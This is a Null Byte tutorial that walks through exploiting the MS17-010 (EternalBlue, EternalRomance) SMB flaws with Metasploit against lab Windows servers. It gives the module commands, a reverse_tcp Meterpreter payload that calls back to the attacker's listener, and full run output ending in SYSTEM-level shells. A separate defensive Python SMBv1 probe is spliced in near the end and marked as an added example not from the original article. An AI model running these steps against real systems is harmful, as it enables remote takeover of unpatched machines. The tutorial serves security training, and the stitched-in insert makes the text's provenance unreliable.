
Using EternalBlue on Windows Server with Metasploit «null byte :: WonderHowTo



Certain vulnerabilities and exploits make headlines with their catchy names and impressive damage potential. EternalBlue is one of those exploits. Originally attributed to the NSA, this zero-day exploited a flaw in the SMB protocol that affected many Windows machines and caused devastation everywhere. Here we will use EternalBlue to exploit SMB via Metasploit.

What is EternalBlue?

EternalBlue is an exploit most likely developed by the NSA as a former zero-day. It was released in 2017 by the Shadow Brokers, a hacker group known for leaking tools and exploits used by the Equation Group, which may have links to the NSA's Tailored Access Operations unit.

EternalBlue, also known as MS17-010, is a vulnerability in the Microsoft Server Message Block (SMB) protocol. SMB allows systems to share files, printers, and other resources on the network. The vulnerability exists because earlier versions of SMB contain a flaw that allows an attacker to establish a null-session connection via anonymous logon. An attacker can then send malformed packets and eventually execute arbitrary commands on the target.

EternalBlue was mainly responsible for the WannaCry, NotPetya and BadRabbit outbreaks, as well as the EternalRocks worm.

Option 1: Exploit EternalBlue with Metasploit

We are using an unpatched copy of Windows Server 2008 R2 as the target for the first section of this tutorial. An evaluation copy can be downloaded from Microsoft if you want to follow along.

Step 1: Find a module to use

The first thing we need to do is open a terminal and start Metasploit. Enter service postgresql start to initialize the PostgreSQL database if it is not already running, followed by msfconsole.

  service postgresql start
msfconsole 

Then use the search command in Metasploit to find a suitable module.

  search eternalblue 
  Matching Modules
==================

   Name                                           Disclosure Date  Rank     Check  Description
   ----                                           ---------------  ----     -----  -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 

There is also an auxiliary scanner that can be used to determine whether a target is vulnerable to MS17-010. It is always a good idea to do the necessary reconnaissance like this first; otherwise you could waste a lot of time on a target that is not even vulnerable.

Once we have determined that our target is actually vulnerable to EternalBlue, we can load the exploit module from the search we just performed.

  use exploit/windows/smb/ms17_010_eternalblue 

You'll know you're good to go when you see the prompt change to "exploit(windows/smb/ms17_010_eternalblue)".

Step 2: Run the module

You can view the current settings with the options command.

  options 
  Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs 

First, we need to set the IP address of the target.

  set rhosts 10.10.0.101 
  rhosts => 10.10.0.101 

Next, we can load the trusty reverse_tcp Meterpreter shell as the payload.

  set payload windows/x64/meterpreter/reverse_tcp 
  payload => windows/x64/meterpreter/reverse_tcp 

Then set the listening host (lhost) to the IP address of our local machine.

  set lhost 10.10.0.1 
  lhost => 10.10.0.1 

And set the listening port (lport) to an appropriate number.

  set lport 4321 
  lport => 4321 

That should be everything, so all that's left is to start the exploit. Use the run command to fire it off.

  run 
  [*] Started reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.101:445 - Connecting to target for exploitation.
[+] 10.10.0.101:445 - Connection established for exploitation.
[+] 10.10.0.101:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.0.101:445 - CORE raw buffer dump (51 bytes)
[*] 10.10.0.101:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.10.0.101:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 10.10.0.101:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 10.10.0.101:445 - 0x00000030  6b 20 31                                         k 1
[+] 10.10.0.101:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.0.101:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.0.101:445 - Sending all but last fragment of exploit packet
[*] 10.10.0.101:445 - Starting non-paged pool grooming
[+] 10.10.0.101:445 - Sending SMBv2 buffers
[+] 10.10.0.101:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.0.101:445 - Sending final SMBv2 buffers.
[*] 10.10.0.101:445 - Sending last fragment of exploit packet!
[*] 10.10.0.101:445 - Receiving response from exploit packet
[+] 10.10.0.101:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.101:445 - Sending egg to corrupted connection.
[*] 10.10.0.101:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.10.0.101
[*] Meterpreter session 1 opened (10.10.0.1:4321 -> 10.10.0.101:49207) at 2019-03-26 11:01:46 -0500
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > 

We can see a few things happening here, such as the SMB connection being made and the exploit packet being sent. Finally, we see a "WIN" and a Meterpreter session is opened. Sometimes this exploit does not complete successfully on the first attempt, so if it fails, try running it again.

Step 3: Verify that the target is compromised

We can verify that we have compromised the target by running commands such as sysinfo to obtain operating system information.

  sysinfo 
  Computer        : S02
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : DLAB
Logged On Users : 2
Meterpreter     : x64/windows 

and getuid to get the current username.

  getuid 
  Server username: NT AUTHORITY\SYSTEM 

This exploit does not work very well on newer systems, and in some cases the target machine may crash. Next, we will look at a similar exploit that is a little more reliable, but just as deadly.

Option 2: EternalRomance/EternalSynergy/EternalChampion

As if EternalBlue wasn't devastating enough, three more similar exploits were developed after it. EternalRomance and EternalSynergy use a type confusion (CVE-2017-0143), while EternalChampion and EternalSynergy use a race condition (CVE-2017-0146).

These were combined into a single Metasploit module that also uses the classic psexec payload. It is considered more reliable than EternalBlue, is less likely to crash the target, and works on all newer unpatched versions of Windows, up through Server 2016 and Windows 10.

The only caveat is that this exploit requires a named pipe. Named pipes provide a way for processes to communicate with each other (inter-process communication); they usually appear as a file that other processes can connect to. The Metasploit module automatically checks for named pipes, so it's pretty easy to use as long as a named pipe is present on the target.

Step 1: Find a vulnerable target

As an alternative to the Metasploit scanner, we can use Nmap to find out whether a target is vulnerable to EternalBlue. The Nmap Scripting Engine is a powerful feature of the core tool that lets you run all sorts of scripts against a target.

Here we use the script smb-vuln-ms17-010 to check for the vulnerability. Our target is an unpatched copy of Windows Server 2016 Datacenter Edition. Evaluation copies can be downloaded from Microsoft if you want to follow along.

We can specify a single script to run with the --script option, along with the -v flag for verbosity and the IP address of our target. First, change directories if you are still in Metasploit.

  cd
nmap --script smb-vuln-ms17-010 -v 10.10.0.100 

Nmap will run and should not take too long, since we are only running a single script. The results are at the end of the output.

  Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-26 11:05 CDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:05

...

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

NSE: Script Post-scanning.
Initiating NSE at 11:05
Completed NSE at 11:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.31 seconds
           Raw packets sent: 1181 (51.948KB) | Rcvd: 1001 (40.060KB) 

We can see that the target is reported as vulnerable, along with other information such as the risk factor and links to the CVE.

Step 2: Find a module to use

Now that we know that the target is vulnerable, we can return to Metasploit and look for a suitable exploit.

  msfconsole
search eternalromance 
  Matching Modules
==================

   Name                                  Disclosure Date  Rank    Check  Description
   ----                                  ---------------  ----    -----  -----------
   auxiliary/admin/smb/ms17_010_command  2017-03-14       normal  Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   exploit/windows/smb/ms17_010_psexec   2017-03-14       normal  No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 

And load the module in Metasploit with the use command.

  use exploit/windows/smb/ms17_010_psexec 

You'll know you're good to go when you see the prompt change to "exploit(windows/smb/ms17_010_psexec)".

Step 3: Run the module

Let's look at our options:

  options 
  Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                  Required  Description
   ----                  ---------------                                                  --------  -----------
   DBGTRACE              false                                                            yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                               yes       How many times to try to leak transaction
   NAMEDPIPE                                                                              no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                 yes       The target address range or CIDR identifier
   RPORT                 445                                                              yes       The target port (TCP)
   SERVICE_DESCRIPTION                                                                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                   no        The service display name
   SERVICE_NAME                                                                           no        The service name
   SHARE                 ADMIN$                                                           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                                no        The Windows domain to use for authentication
   SMBPass                                                                                no        The password for the specified username
   SMBUser                                                                                no        The username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Automatic 

It looks like this exploit works through a list of named pipes to check and connects to a share. We can leave all of this at the defaults for now, but we do need to set the remote host.

  set rhosts 10.10.0.100 
  Rhosts => 10.10.0.100 

And the reverse shell payload.

  set payload windows/x64/meterpreter/reverse_tcp 
  payload => windows / x64 / meterpreter / reverse_tcp 

And our local host.

  set lhost 10.10.0.1 
  lhost => 10.10.0.1 

and local port.

  set lport 4321 
  lport => 4321 

We should be fine now. Enter run to start the exploit.

  run 
  [*] Started reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.100:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.0.100:445 - Built a write-what-where primitive...
[+] 10.10.0.100:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.0.100:445 - Selecting PowerShell target
[*] 10.10.0.100:445 - Executing the payload...
[+] 10.10.0.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (206403 bytes) to 10.10.0.100
[*] Meterpreter session 2 opened (10.10.0.1:4321 -> 10.10.0.100:49965) at 2019-03-26 11:12:30 -0500 

We can see the payload run successfully, and we end up with a Meterpreter session.

Step 4: Verify that the target is compromised

Again, we can verify that we have compromised the system with commands such as sysinfo.

  sysinfo 
  Computer        : DC01
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : DLAB
Logged On Users : 4
Meterpreter     : x64/windows 

and getuid.

  getuid 
  Server username: NT AUTHORITY\SYSTEM 

Prevention and Current Status

Despite all the damage EternalBlue has caused, there is a reliable way to prevent this type of exploit: patch your systems! At this point, almost two years after these vulnerabilities became public, there is really no excuse for running unpatched operating systems.

EternalBlue is still a problem, and while the consequences are unfortunate, some organizations will still be running unpatched systems. Combined with pirated versions of Windows, EternalBlue remains a major threat today.

Cryptojacking, in which a victim's computer is secretly used to mine cryptocurrency, is another threat that has used EternalBlue in its attacks. WannaMine was one such outbreak that hijacked computers around the world in 2018.
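Patching closes the hole, and because MS17-010 is a flaw in SMBv1, a host that no longer negotiates any SMBv1 dialect is also out of reach of the modules above. The probe below is an added example, not code from the original article or from Metasploit: it builds a single SMBv1 Negotiate request, parses the reply, and reports whether a host still accepts SMBv1 so it can be queued for patching. The 10.10.0.100 lab address is taken from the tutorial and is an assumption; the sample replies are constructed, not captured traffic.

```python
import socket
import struct

# Added example (not from the original article or Metasploit): inventory hosts that
# still speak SMBv1, the dialect family MS17-010 (EternalBlue) lives in.

DIALECT = b"NT LM 0.12"   # the only dialect we offer; an index of 0xFFFF back means "refused"
# 32-byte SMB1 header: \xffSMB, command 0x72 (NEGOTIATE), NT status, flags, flags2, 20 zero bytes
_HEADER = b"\xffSMB\x72" + b"\x00" * 4 + b"\x18" + b"\x53\xc8" + b"\x00" * 20


def build_negotiate() -> bytes:
    """NetBIOS session message carrying an SMB_COM_NEGOTIATE request."""
    data = b"\x02" + DIALECT + b"\x00"                       # one dialect entry
    body = b"\x00" + struct.pack("<H", len(data)) + data     # WordCount 0, ByteCount, dialects
    msg = _HEADER + body
    return b"\x00" + struct.pack(">I", len(msg))[1:] + msg   # NetBIOS: type 0 + 3-byte length


def parse_negotiate_response(raw: bytes):
    """Return (nt_status, dialect_index); dialect_index 0xFFFF means no SMBv1 dialect accepted."""
    if len(raw) < 39 or raw[4:8] != b"\xffSMB" or raw[8] != 0x72:
        raise ValueError("not an SMBv1 Negotiate response")
    nt_status = struct.unpack("<I", raw[9:13])[0]
    word_count = raw[36]                                     # parameter words after the header
    dialect_index = struct.unpack("<H", raw[37:39])[0] if word_count else 0xFFFF
    return nt_status, dialect_index


def smb1_enabled(raw: bytes) -> bool:
    status, index = parse_negotiate_response(raw)
    return status == 0 and index != 0xFFFF


def probe(host: str, port: int = 445, timeout: float = 3.0):
    """Live check: True = SMBv1 accepted, False = refused, None = no SMBv1 reply (SMB2-only or closed)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_negotiate())
            raw = sock.recv(4096)
    except OSError:
        return None
    return smb1_enabled(raw) if raw[4:8] == b"\xffSMB" else None


# Constructed sample replies (not captured traffic): server-side flags 0x98, then parameters.
_REPLY_HDR = b"\xffSMB\x72" + b"\x00" * 4 + b"\x98" + b"\x53\xc8" + b"\x00" * 20
SAMPLE_ACCEPTED = b"\x00\x00\x00\x27" + _REPLY_HDR + b"\x11\x00\x00" + b"\x00" * 4  # WordCount 17, index 0
SAMPLE_REFUSED = b"\x00\x00\x00\x25" + _REPLY_HDR + b"\x01\xff\xff" + b"\x00\x00"   # WordCount 1, 0xFFFF

if __name__ == "__main__":
    print(probe("10.10.0.100"))   # lab address from the tutorial; assumption
```

A True result means the host still negotiates SMBv1 and should be on the MS17-010 patch list; None is what a host with SMBv1 disabled returns, since it simply drops the SMBv1 request.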

Summary

Today we learned how to use EternalBlue with Metasploit. We also learned that a similar exploit is more reliable and works on more systems. In the next tutorial, we'll dig a little deeper and learn how to use EternalBlue manually, which is far more satisfying in the end.

Cover image by Fancycrave/Pexels; screenshots by drd_/Null Byte
